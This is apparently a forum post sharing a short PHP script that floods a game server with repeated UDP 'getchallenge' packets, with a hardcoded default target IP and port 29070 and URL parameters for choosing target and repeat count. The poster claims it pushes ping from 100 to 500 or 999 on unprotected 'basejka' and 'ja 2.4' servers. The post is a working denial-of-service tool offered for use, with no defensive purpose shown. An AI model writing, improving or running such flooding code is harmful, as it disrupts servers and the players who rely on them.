without affectingAttachment:
script.php.jpg [ 59.35 KiB | Viewed 650 times ]
<?
#The main requirement, a wide channel of your server!
set_time_limit(0);
if(isset($_GET['ip'])){
$ip = $_GET['ip'];
}else{
$ip = '86.110.181.156';
}
if(isset($_GET['port'])){
$port = $_GET['port'];
}else{
$port = 29070;
}
function brut($ip, $port) {
$s = fsockopen("udp://$ip", "$port");
for($i=0;$i<=50;$i++){
fwrite($s, "\xFF\xFF\xFF\xFFgetchallenge\x20");
}
}
#id = How many times script.rar?id=123456
if(isset($_GET['id'])){
for($l=0;$l<=$_GET['id'];$l++){
brut($ip, $port);
sleep(1);
}
}
?>
ping rises at times from 100 to 500 or 999
working on "basejka" and "ja 2.4 beta 6
possible and others where there is no protection
After exposureAttachment:
123.JPG [ 25.62 KiB | Viewed 646 times ]